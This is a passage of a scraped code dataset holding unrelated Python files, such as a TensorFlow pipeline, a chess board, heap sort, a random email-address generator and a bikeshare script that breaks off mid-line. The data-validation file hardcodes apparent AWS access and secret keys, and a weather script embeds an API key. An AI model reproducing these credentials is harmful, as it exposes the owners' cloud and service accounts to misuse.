[tokens, size])), label\n\n def create_bucket_dataset(self, movie_dataset):\n def batching_func(dataset):\n return dataset.padded_batch(\n self.batch_size,\n padded_shapes=(\n {\n 'words': tf.TensorShape([None]),\n 'size': tf.TensorShape([])\n },\n tf.TensorShape([])) # size\n )\n\n def key_func(features, label):\n size = features['size']\n bucket_id = size // self.bucket_width\n\n return tf.to_int64(tf.minimum(bucket_id, self.num_buckets))\n\n def reduce_func(bucket_key, widowed_data):\n return batching_func(widowed_data)\n\n movie_dataset = movie_dataset.apply(\n tf.contrib.data.group_by_window(\n key_func=key_func, reduce_func=reduce_func, window_size=self.batch_size))\n\n return movie_dataset\n\n def create_dataset(self):\n movie_dataset = tf.data.TFRecordDataset(self.data_file).map(self.parser)\n\n if self.perform_shuffle:\n movie_dataset = movie_dataset.shuffle(buffer_size=self.batch_size * 2)\n\n self.movie_dataset = self.create_bucket_dataset(movie_dataset)\n\n return self.movie_dataset\n","repo_name":"lucasmoura/movie_critic_stars","sub_path":"model/input_pipeline.py","file_name":"input_pipeline.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"9022888290","text":"\"\"\"\nЗадание_4. 
Определить, какое число в массиве встречается чаще всего\n\n\"\"\"\nimport random\n\nSIZE = 10\nMIN_ITEM = 0\nMAX_ITEM = 5\narray = [random.randint(MIN_ITEM, MAX_ITEM) for _ in range(SIZE)]\n# array = [11, 0, 11, 8,8,8,8,8, 13]\nprint(array)\nmax_count = 0\nmax_ind = 0\nfor i in range(len(array)):\n ccc = 0\n j = i + 1\n for j in range(len(array)):\n if array[i] == array[j]:\n ccc += 1\n if max_count < ccc:\n max_count = ccc\n max_ind = i\n\nprint(f'число {array[max_ind]} в массиве встречается чаще, всего {max_count} раз(а))')\n","repo_name":"Bulgakoff/PyAlg","sub_path":"Lesson03/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15677221918","text":"from Enums.colors import Color\nfrom Enums.unicode import Unicode\nfrom Pieces.bishop import Bishop\nfrom Pieces.king import King\nfrom Pieces.knight import Knight\nfrom Pieces.pawn import Pawn\nfrom Pieces.queen import Queen\nfrom Pieces.rook import Rook\n\n# noinspection PyTypeChecker\nclass Board:\n def __init__(self):\n self.width = 8\n self.height = 8\n self.board = self.newGame()\n\n def newGame(self):\n board = [[None]*self.width for _ in range(self.height)]\n\n # White\n board[0][0] = Rook(Color.WHITE, 0, 0)\n board[0][1] = Knight(Color.WHITE, 0, 1)\n board[0][2] = Bishop(Color.WHITE, 0, 2)\n board[0][3] = Queen(Color.WHITE, 0, 3)\n board[0][4] = King(Color.WHITE, 0, 4)\n board[0][5] = Bishop(Color.WHITE, 0, 5)\n board[0][6] = Knight(Color.WHITE, 0, 6)\n board[0][7] = Rook(Color.WHITE, 0, 7)\n for col in range(self.width):\n board[1][col] = Pawn(Color.WHITE, 1, col)\n\n # Black\n for col in range(self.width):\n board[self.height - 2][col] = Pawn(Color.BLACK, self.height - 2, col)\n board[7][0] = Rook(Color.BLACK, 7, 0)\n board[7][1] = Knight(Color.BLACK, 7, 1)\n board[7][2] = Bishop(Color.BLACK, 7, 2)\n board[7][3] = Queen(Color.BLACK, 7, 3)\n board[7][4] = King(Color.BLACK, 7, 4)\n board[7][5] = Bishop(Color.BLACK, 7, 5)\n board[7][6] = Knight(Color.BLACK, 7, 6)\n board[7][7] = Rook(Color.BLACK, 7, 7)\n\n return board\n\n def print(self):\n for row in self.board:\n pRow = []\n for place in row:\n if place is not None:\n pRow.append(Unicode.chrs[(place.color, place.__class__)])\n print(pRow)\n\nb = Board()\nb.newGame()\nb.print()\n","repo_name":"mextenderr/pyChess","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12715924660","text":"# Python version: 3.9.7\n# Date: 6/23/2022\n# Author: Mohammed Hassan\n# Description: Email Generator\n# Telegram channel: https://t.me/python_2\n\n#Libraries\nimport string\nimport random\n\n#Msg start\nprint(\"Telegram Channel:\"'\\n'\"https://t.me/python_2\")\nprint(\"1 - yahoo\"'\\n'\"2 - gmail\"'\\n'\"3- Hotmail\"'\\n'\"Choose any domail\")\n\n#Variables\nletters = string.ascii_lowercase\nemail = int(input(\"domain : \"))\nGenerator = int(input(\"How many emails: \"))\nSTOP = 0\nLetters = 0\nFile_Email = open(\"email.txt\", \"w\")\nranges = int(input(\"email characters range : \"))\n\n#Loop\nwhile True:\n\n\n if email == 1:\n File_Email.write(''.join(random.choice(letters) for i in range(ranges))+'@yahoo.com'+'\\n')\n STOP += 1\n if STOP == Generator:\n break\n\n if email == 2:\n File_Email.write(''.join(random.choice(letters) for i in range(ranges)) + '@gmail.com' + '\\n')\n STOP += 1\n if STOP == Generator:\n break\n\n if 
email == 3:\n File_Email.write(''.join(random.choice(letters) for i in range(ranges)) + '@Hotmail.com' + '\\n')\n STOP += 1\n if STOP == Generator:\n break\n\n#Msg end\nprint(\"Done Generator!\")\n\n","repo_name":"mgkw/Email-Generator","sub_path":"Email _Generator.py","file_name":"Email _Generator.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35914430974","text":"class Solution:\n \"\"\"\n @param n: An integer\n @return: return a integer as description.\n \"\"\"\n\n def nthUglyNumber(self, n: int) -> int:\n heap = [1]\n visited = {1}\n cur_val = 0\n import heapq\n for i in range(n):\n cur_val = heapq.heappop(heap)\n for factor in [2, 3, 5]:\n next_val = cur_val * factor\n if next_val in visited:\n continue\n heapq.heappush(heap, next_val)\n visited.add(next_val)\n return cur_val\n","repo_name":"Super262/LintCodeSolutions","sub_path":"data_structures/heap/problem0004.py","file_name":"problem0004.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"27000107111","text":"import requests\r\nfrom collections.abc import Iterable, Iterator\r\n\r\nclass WeatherIterator(Iterator):\r\n def __init__(self, cities):\r\n self.cities = cities\r\n self.index = 0\r\n\r\n def __next__(self):\r\n if self.index == len(self.cities):\r\n raise StopIteration\r\n city = self.cities[self.index]\r\n self.index += 1\r\n return self.getWeather(city)\r\n\r\n def getWeather(self, city):\r\n # 使用心知天气API获取城市天气数据\r\n api_key = \"Sq1lM8msLFRwgRGKj\"\r\n url = f\"https://api.seniverse.com/v3/weather/now.json?key={api_key}&location={city}&language=zh-Hans&unit=c\"\r\n response = requests.get(url)\r\n data = response.json()\r\n weather = data[\"results\"][0][\"now\"][\"text\"]\r\n temperature = data[\"results\"][0][\"now\"][\"temperature\"]\r\n return f\"{city}: {weather},温度:{temperature}°C\"\r\n\r\nclass WeatherIterable(Iterable):\r\n def __init__(self, cities):\r\n self.cities = cities\r\n\r\n def __iter__(self):\r\n return WeatherIterator(self.cities)\r\n\r\n# 调用示例\r\ncities = ['北京', '上海', '广州', '深圳']\r\nweather_data = WeatherIterable(cities)\r\n\r\nfor data in weather_data:\r\n print(data)","repo_name":"wanghan79/2023_Python","sub_path":"2021011891吴敏妃/final_work/work3.py","file_name":"work3.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"11908647662","text":"import csv\n\n# Files to load and output (Remember to change these)\nfile_to_load = \"budget_data_1.csv\"\nfile_to_output = \"budget_analysis_1.txt\"\n\n# Read the csv and convert it into a reader\n\nwith open(file_to_load,\"r\") as f:\n reader = csv.reader(f,delimiter = \",\")\n data = list(reader)[1:] \n \n # Create two empty lists to populate\n revenue = []\n\n revenue_change = []\n # difference = int(data(row[1]))\n\n for row in data:\n # Populate revenue list and slice out the header\n revenue.append((row[1]))\n # convert list of strings into list of integers\n revenue = list(map(int, revenue)) \n\nchange = 0\nchange = int(change)\nprevious_row = revenue[0]\n\nfor row in revenue:\n change = row - previous_row\n revenue_change.append((change))\n previous_row = row\n\nrevenue_change = revenue_change[1:]\nrevenue_change = list(map(int, revenue_change)) \n\n# Row count without the headers will give you the total number of months. 
\nrow_count = len(revenue) \n# Now that the revenue list is converted to integers, I can sum the row to dete1rmine the total revenue for the spread sheet\ntotal_revenue = sum(revenue) \n# Determine the average change between months\ntotal_change = sum(revenue_change)\ntotal_change = int(total_change)\nnumber_of_changes = len(revenue[1:])\nnumber_of_changes = int(number_of_changes)\naverage_change = total_change / number_of_changes\n\n# Make of new list of the changes by months\n\nmonth2 = []\n\nfor row in data:\n # Populate revenue list and slice out the header\n month2.append((row[0]))\n # convert list of strings into list of integers\n \n \n \nmonth2 = month2[1:]\nmonth_changes = [\n (\"Month\", [month2]),\n (\"Changes in Revenue\", [revenue_change])]\n\n# Determine the Maximun and Minumum monthly revenue in the list\n\nMax = max(revenue)\nMin = min(revenue)\nMax2 = max(revenue_change)\nMin2 = min(revenue_change) \n\n\n\nfor row in data:\n if row[1] == str(Max):\n max_row = row\n\nfor row in data:\n if row[1] == str(Min):\n min_row = row\n\nkeys = month2\nvalues = revenue_change\ndictionary = dict(zip(keys, values))\n\n\n\n# Print Output\nprint(\" Financial Analysis ----------------------------\")\nprint(\" Total Months - \", row_count)\nprint(\" Total Reveue- \", total_revenue)\nprint(\" Average Revenue Change- \", average_change)\nprint(\" Month with the Greatest Revenue- \", max_row)\nprint(\" Month with the Lowest Revenue- \", min_row)\nprint(\" Greatest Increase in Revenue- \", max(dictionary), Max2)\nprint(\" Greatest Decrease in Revenue- \", min(dictionary), Min2)\n\n\n\n\n","repo_name":"mikebarajas/PyBank-Analysis","sub_path":"pybank.py","file_name":"pybank.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"1741892192","text":"from typing import Tuple\n\nimport numpy as np\n\nfrom scipy.linalg import sqrtm, schur, block_diag\nfrom scipy.optimize import root_scalar\n\nfrom piquasso._math.symplectic import xp_symplectic_form\nfrom piquasso._math.transformations import from_xxpp_to_xpxp_transformation_matrix\n\nfrom piquasso.api.exceptions import InvalidParameter\n\n\ndef takagi(matrix, calculator, rounding=12):\n \"\"\"Takagi factorization of complex symmetric matrices.\n\n Note:\n\n The singular values have to be rounded due to floating point errors.\n\n The result is not unique in a sense that different result could be obtained\n by different ordering of the singular values.\n\n References:\n - https://journals.aps.org/pra/abstract/10.1103/PhysRevA.94.062109\n \"\"\"\n\n np = calculator.np\n\n V, singular_values, W_adjoint = calculator.svd(matrix)\n\n W = np.conj(W_adjoint).T\n\n singular_value_multiplicity_map = {}\n\n for index, value in enumerate(singular_values):\n value = calculator.fallback_np.round(value, decimals=rounding)\n\n if value not in singular_value_multiplicity_map:\n singular_value_multiplicity_map[value] = [index]\n else:\n singular_value_multiplicity_map[value].append(index)\n\n diagonal_blocks_for_Q = []\n\n for indices in singular_value_multiplicity_map.values():\n Z = V[:, indices].transpose() @ W[:, indices]\n\n diagonal_blocks_for_Q.append(calculator.sqrtm(Z))\n\n Q = calculator.block_diag(*diagonal_blocks_for_Q)\n\n return singular_values, V @ np.conj(Q)\n\n\ndef _rotation_to_positive_above_diagonals(block_diagonal_matrix):\n \"\"\"\n The block diagonal matrix returned by the Schur decomposition in the Williamson\n decomposition needs to be 
rotated.\n\n Not doing this we'd still get a valid Williamson decompostion with valid symplectic\n and diagonal matrices, but the symplectic matrix would have complex elements and the\n diagonal matrix would have negative values.\n \"\"\"\n\n d = len(block_diagonal_matrix) // 2\n identity = np.identity(2)\n rotation = np.rot90(identity)\n\n return block_diag(\n *[\n identity\n if block_diagonal_matrix[2 * index, 2 * index + 1] > 0\n else rotation\n for index in range(d)\n ]\n )\n\n\ndef williamson(matrix: np.ndarray) -> tuple:\n r\"\"\"\n Decomposes a positive definite matrix with Williamson decomposition, i.e. a\n positive definite :math:`M` is decomposed to\n\n .. math::\n\n M = S D S^T,\n\n where :math:`S \\in \\operatorname{Sp}(\\mathbb{R}, 2d)` is a real symplectic matrix,\n and :math:`D` is a diagonal matrix containing positive values in the diagonal.\n\n The algorithm works as follows: without loss of generality, one can write the\n symplectic matrix in the form of\n\n .. math::\n\n S = M^{1 / 2} K D^{- 1 / 2}\n\n with :math:`K \\in O(2d)`, since then\n\n .. math::\n\n M = S D S^T\n\n by construction. Now we need to find such :math:`K` that the value of :math:`S` is\n symplectic.\n\n .. math::\n\n S^T \\Omega S = \\Omega\n \\rightleftarrow\n M^{- 1 / 2} J M^{- 1 / 2} = K D^{- 1 / 2} J D^{- 1 / 2} K^T,\n\n where\n\n .. math::\n\n D^{- 1 / 2} J D^{- 1 / 2}\n =\n \\begin{bmatrix}\n 0 & \\hat{D}^{-1} \\\\\n \\hat{D}^{-1} & 0 \\\\\n \\end{bmatrix}\n\n is an antisymmetric matrix. We also know that :math:`M^{- 1 / 2} J M^{- 1 / 2}` is\n also antisymmetric. We just need to deduce the orthogonal transformation :math:`K`\n to acquire the symplectic matrix :math:`S`.\n\n We can use a (real) Schur decomposition to block-diagonalize\n :math:`M^{- 1 / 2} J M^{- 1 / 2}`. Note, that we also rotate the block to have the\n positive values in the above the diagonal to acquire real-valued symplectic matrices\n in the Williamson decomposition. 
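(A quick sanity check of this claim, assuming a single mode: :math:`M = \\mathrm{diag}(a, b)` with :math:`a, b > 0` gives :math:`D = \\sqrt{ab}\\, I_2` and :math:`S = \\mathrm{diag}((a/b)^{1/4}, (b/a)^{1/4})`; a direct computation confirms :math:`S D S^T = M` and :math:`\\det S = 1`, which for one mode makes :math:`S` symplectic.)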
Finally, we can acquire\n :math:`D^{- 1 / 2} J D^{- 1 / 2}` with a simple basis change.\n\n References:\n - https://math.stackexchange.com/a/1244793\n\n Args:\n matrix (numpy.ndarray): The matrix to decompose.\n\n Returns\n tuple: Tuple of the symplectic and diagonal matrices, in this order.\n \"\"\"\n\n d = len(matrix) // 2\n\n omega = xp_symplectic_form(d)\n\n root_matrix = sqrtm(matrix).real\n inverse_root_matrix = np.linalg.inv(root_matrix)\n\n block_diagonal_part, orthogonal_part = schur(\n inverse_root_matrix @ omega @ inverse_root_matrix,\n output=\"real\",\n )\n\n basis_change = _rotation_to_positive_above_diagonals(\n block_diagonal_part\n ) @ from_xxpp_to_xpxp_transformation_matrix(d)\n ordered_block_diagonal = basis_change.T @ block_diagonal_part @ basis_change\n\n inverse_diagonal_matrix = block_diag(*(ordered_block_diagonal[:d, d:],) * 2)\n\n root_inverse_diagonal_matrix = np.diag(np.sqrt(np.diag(inverse_diagonal_matrix)))\n\n symplectic = (\n root_matrix @ orthogonal_part @ basis_change @ root_inverse_diagonal_matrix\n )\n\n diagonal_matrix = np.diag(1 / np.diag(inverse_diagonal_matrix))\n\n return symplectic, diagonal_matrix\n\n\ndef decompose_to_pure_and_mixed(\n matrix: np.ndarray,\n hbar: float,\n) -> Tuple[np.ndarray, np.ndarray]:\n symplectic, diagonal = williamson(matrix)\n pure_covariance = hbar * symplectic @ symplectic.transpose()\n mixed_contribution = (\n symplectic\n @ (diagonal - hbar * np.identity(len(diagonal)))\n @ symplectic.transpose()\n )\n return pure_covariance, mixed_contribution\n\n\ndef decompose_adjacency_matrix_into_circuit(\n adjacency_matrix, mean_photon_number, calculator\n):\n singular_values, unitary = takagi(adjacency_matrix, calculator)\n\n scaling = _get_scaling(singular_values, mean_photon_number, adjacency_matrix)\n\n squeezing_parameters = np.arctanh(scaling * singular_values)\n\n return squeezing_parameters, unitary\n\n\ndef _get_scaling(\n singular_values: np.ndarray, mean_photon_number: float, adjacency_matrix: np.ndarray\n) -> float:\n r\"\"\"\n For a squeezed state :math:`rho` the mean photon number is calculated by\n\n .. 
math::\n \\langle n \\rangle_\\rho = \\sum_{i = 0}^d \\mathrm{sinh}(r_i)^2\n\n where :math:`r_i = \\mathrm{arctan}(s_i)`, where :math:`s_i` are the singular\n values of the adjacency matrix.\n \"\"\"\n\n def mean_photon_number_equation(scaling: float) -> float:\n return (\n sum(\n (scaling * singular_value) ** 2 / (1 - (scaling * singular_value) ** 2)\n for singular_value in singular_values\n )\n / len(singular_values)\n - mean_photon_number\n )\n\n def mean_photon_number_gradient(scaling: float) -> float:\n return (2.0 / scaling) * np.sum(\n (singular_values * scaling / (1 - (singular_values * scaling) ** 2)) ** 2\n )\n\n lower_bound = 0.0\n\n tolerance = 1e-10 # Needed to avoid zero division.\n\n upper_bound = 1.0 / (max(singular_values) + tolerance)\n\n result = root_scalar(\n mean_photon_number_equation,\n fprime=mean_photon_number_gradient,\n x0=(lower_bound - upper_bound) / 2.0,\n bracket=(lower_bound, upper_bound),\n )\n\n if not result.converged:\n raise InvalidParameter(\n f\"No scaling found for adjacency matrix: {adjacency_matrix}.\"\n )\n\n return result.root\n","repo_name":"Budapest-Quantum-Computing-Group/piquasso","sub_path":"piquasso/_math/decompositions.py","file_name":"decompositions.py","file_ext":"py","file_size_in_byte":7358,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"6"} +{"seq_id":"41945835884","text":"# we need to adding each digits of a number\n# 576 => 5+7+6 = 18 => 1+ 8 = 9\n\n# x = int(input('enter a number : ')) # 576\n# sum_digit = 0\n# sum_of_digits = 0\n# for digit in str(x):\n# sum_digit += int(digit)\n# print(sum_digit, end=' ')\n# for digit in str(sum_digit):\n# sum_of_digits += int(digit)\n# # print(sum_of_digits, end=' ')\n# print(f'sum of each digits is {sum_of_digits}')\n# enter a number : 576\n# 5 12 18 sum of each digits is 9\n\n# or compact way\nnumber = 576\n\nsum_of_digits = sum(int(digit) for digit in str(number))\nsum_digit = sum(int(digit) for digit in str(sum_of_digits))\nprint(sum_digit) # 9\n","repo_name":"hyraja/python-starter","sub_path":"Interview_python/sum of digit.py","file_name":"sum of digit.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73023041147","text":"import os\nfrom mlProject import logger\nimport boto3\nfrom mlProject.entity.config_entity import Datavalidationconfig\nimport pandas as pd\n\nclass DataValidation():\n def __init__(self,config:Datavalidationconfig):\n self.config = config\n\n def validate_all_columns(self) -> bool:\n try:\n\n validation_status = None\n\n s3 = boto3.client('s3')\n s3 = boto3.resource(\n service_name='s3',\n region_name='us-east-1',\n aws_access_key_id = 'AKIAU473WEHAZP5Q63UT',\n aws_secret_access_key = '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'\n )\n\n obj = s3.Bucket('vedanshaws').Object('winequality-red.csv').get()\n\n data = pd.read_csv(obj['Body'], index_col=0)\n all_columns = list(data.columns)\n\n all_schema = self.config.all_schema.keys()\n\n for col in all_columns:\n if col not in all_schema:\n validation_status = False\n with open(self.config.status_file, 'w') as f:\n f.write(f\"VALIDATION_STATUS : {validation_status}\")\n\n else:\n validation_status = True\n with open(self.config.status_file,'w') as f:\n f.write(f\"VALIDATION_STATUS : {validation_status}\")\n\n return validation_status\n \n except Exception as e:\n raise 
e","repo_name":"Vedansh1857/end-to-end-ml-project-with-mlflow","sub_path":"src/mlProject/components/data_validation.py","file_name":"data_validation.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"75096005628","text":"import math\n\ndef filterTags(attrs):\n tags = {\"natural\": \"tree\",\n \"species\": attrs[\"NAMESCIENTIFIC\"]}\n if attrs[\"DIAMETER\"]:\n tags[\"diameter_crown\"] = str(int(round(float(attrs[\"DIAMETER\"])*0.3048)))\n if attrs[\"HEIGHT\"]:\n tags[\"height\"] = str(int(round(float(attrs[\"HEIGHT\"])*0.3048)))\n if attrs[\"TRUNKDIAM\"]:\n diamInches = float(attrs[\"TRUNKDIAM\"])\n circInches = math.pi*diamInches\n circMeters = circInches*0.0254\n tags[\"circumference\"] = str(round(circMeters, 1))\n return tags\n\n","repo_name":"impiaaa/SV-OSM","sub_path":"translations/trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"24958152433","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n # Floyd's tortoise and Hare Algo\n \n if head == None:\n return None\n \n tort = head\n hare = head\n \n while True:\n tort = tort.next\n hare = hare.next\n if hare == None or hare.next == None:\n return None\n hare = hare.next\n if hare == tort:\n break\n \n current = head\n while current != hare:\n current = current.next\n hare = hare.next\n return current\n","repo_name":"MrBmikhael/LeetCodeProblems","sub_path":"linked-list-cycle-ii/linked-list-cycle-ii.py","file_name":"linked-list-cycle-ii.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71861062909","text":"import matplotlib.pyplot as plt\n\ndef heapify(array, length, index):\n largest = index\n left_child = index * 2 + 1\n right_child = index * 2 + 2\n\n bars = plt.bar(list(range(len(array))), array, color=\"#BB8FCE\")\n bars[largest].set_facecolor('red')\n plt.pause(0.01)\n plt.clf()\n\n if left_child < length and array[largest] < array[left_child]:\n largest = left_child\n\n if right_child < length and array[largest] < array[right_child]:\n largest = right_child\n\n if largest != index:\n array[index], array[largest] = array[largest], array[index]\n heapify(array, length, largest)\n\n\n bars = plt.bar(list(range(len(array))), array, color=\"#BB8FCE\")\n bars[largest].set_facecolor('red')\n plt.pause(0.01)\n plt.clf()\n\n\ndef heap_sort(array):\n length = len(array)\n\n for i in range((length-2) // 2, -1, -1):\n heapify(array, length, i)\n\n for i in range(length - 1, 0, -1):\n array[i], array[0] = array[0], array[i]\n heapify(array, i, 0)","repo_name":"FurkanBerberr/Sorting-Animation","sub_path":"Sorting/SortingAlgorithms/heapsort.py","file_name":"heapsort.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"37158620533","text":"from sklearn.externals.six import StringIO\nfrom sklearn import tree\nimport pydotplus\nimport matplotlib.pyplot as plt\nX = [[1,1,1,0], [1,1,1,1], [2,1,1,0], [2,3,2,1], [1,2,1,0], [1,3,2,0], [3,2,1,0],\n[3,3,2,0], [3,3,2,1], [3,2,2,0], [1,2,2,1], [2,2,1,1], [2,1,2,0], 
[3,2,1,0]]\n\nY = [0,0,1,1,0,1,1,1,0,1,1,1,1,0]\nclf = tree.DecisionTreeClassifier()\nclf = clf.fit(X, Y)\n\ndot_data = StringIO()\ntree.export_graphviz(clf, out_file=dot_data)\ngraph = pydotplus.graph_from_dot_data(dot_data.getvalue())\n\ngraph.write_pdf('datavis/game.pdf')\n\n#branchNode = dict(boxstyle='sawtooth', fc='0.8')\n#leafNode = dict(boxstyle = 'round4', fc='0.8')\n#startNode = dict(boxstyle='sawtooth', fc='0.9')\n#def createPlot():\n# fig = plt.figure(1, facecolor='white')\n# fig.clf()\n# createPlot.ax1 = plt.subplot(111, frameon=False)\n# plotNode =('from here', (0.3,0.8), (0.3, 0.8), startNode)\n# plotNode =('a decision node', (0.5, 0.1), (0.3, 0.8), branchNode)\n# plotNode = ('a leaf node', (0.8, 0.1), (0.3, 0.8), leafNode)\n# plt.show()\n \ncreatePlot()","repo_name":"QiliWu/Python-datavis","sub_path":"datavis/sklearn-tree.py","file_name":"sklearn-tree.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"41628545001","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\nmonths = pd.date_range(start='2023-01-01', periods=12, freq='M')\ndata = pd.DataFrame({\n 'x': range(1, 13),\n 'y1': [56, 67, 72, 65, 75, 96, 70, 63, 68, 100, 88, 64],\n 'y2': [74, 80, 77, 56, 50, 71, 66, 91, 91, 68, 95, 79]\n})\nplt.subplots(figsize=(10, 4))\nmonth_names = ['Янв', 'Фев', 'Мар', 'Апр', 'Май', 'Июн', 'Июл', 'Авг', 'Сен', 'Окт', 'Ноя', 'Дек']\nplt.plot(data['x'], data['y1'], 'go', label='Факт', marker='o', linestyle='-', linewidth=2)\nplt.plot(data['x'], data['y2'], 'ro', marker='o', linestyle='-', linewidth=2, label='План')\nfor i in range(len(data)):\n plt.annotate(f\"{data['y1'][i]}\", (data['x'][i], data['y1'][i]), textcoords=\"offset points\",\n xytext=(0, 0), ha='center')\n plt.annotate(f\"{data['y2'][i]}\", (data['x'][i], data['y2'][i]), textcoords=\"offset points\",\n xytext=(0, 0), ha='center')\n if data['y1'][i] > data['y2'][i]:\n plt.plot([data['x'][i], data['x'][i]], [data['y1'][i], data['y2'][i]], '-g', alpha=0.4, linewidth=12)\n else:\n plt.plot([data['x'][i], data['x'][i]], [data['y1'][i], data['y2'][i]], '-r', alpha=0.4, linewidth=12)\n\nplt.legend(loc='lower center', bbox_to_anchor=(0.5, -0.2), ncol=2)\n\nplt.xticks(data['x'], month_names)\nplt.ylim(0, 120)\nplt.title('Динамика продаж(план-факт)')\n\nplt.show()\n","repo_name":"alexeygradskov-22vp1/pythonProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70130650428","text":"import time\nimport pandas as pd\nimport numpy as np\n\nCITY_DATA = {'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv'}\n\n# make global scope variables to be used in any function i want:\n# Project Cities:\nCities = ['chicago', 'new york city', 'washington']\n# Project Months:\nMonths = ['january', 'february', 'march', 'april', 'may', 'june', 'all']\n# Project Weekdays:\nDays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday', 'all']\n\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! 
Let\\'s explore some US bikeshare data!')\n \n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True:\n city = input('Would you like to see data for chicago, new york city , or washington? \\n> ')\n city = city.lower()\n if city in Cities:\n break\n else:\n print(\"invalid input. Please enter a valid input\")\n # get user input for month (all, january, february, ... , june)\n while True:\n month = input('All right! Which month - January, February, March, April, May, or June?'\n ' or just say \\'all\\' to apply no month filter. \\n> ')\n month = month.lower()\n if month in Months:\n break\n else:\n print(\"invalid input. Please enter a valid input\")\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n while True:\n day = input('All right! Which day - Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, or Sunday?'\n 'or just say \\'all\\' to apply no day filter. \\n> ')\n day = day.lower()\n if day in Days:\n break\n else:\n print(\"invalid input. Please enter a valid input\")\n\n \n print('-' * 40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n # Same as Practice Problem #3: Load and Filter the Dataset\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n\n '''\n df['day_of_the_week'] = df['Start Time'].dt.weekday_name\n AttributeError: 'DatetimeProperties' object has no attribute 'weekday_name'\n Resolved \n https://stackoverflow.com/questions/60339049/weekday-name-from-a-pandas-dataframe-date-object?answertab=votes#tab-top\n _/ weekday_name to day_name() _/\n '''\n\n df['week_day'] = df['Start Time'].dt.day_name()\n\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n month = Months.index(month) + 1\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['week_day'] == day.title()]\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n common_month = df['month'].mode()[0]\n print('Most Frequent Month is :', common_month)\n # display the most common day of week\n common_week_day = df['week_day'].mode()[0]\n print('Most Frequent Day is :', common_week_day)\n # display the most common start hour\n df['hour'] = df['Start Time'].dt.hour\n common_start_hour = df['hour'].mode()[0]\n print('Most Frequent Start Hour is :', common_start_hour)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The 
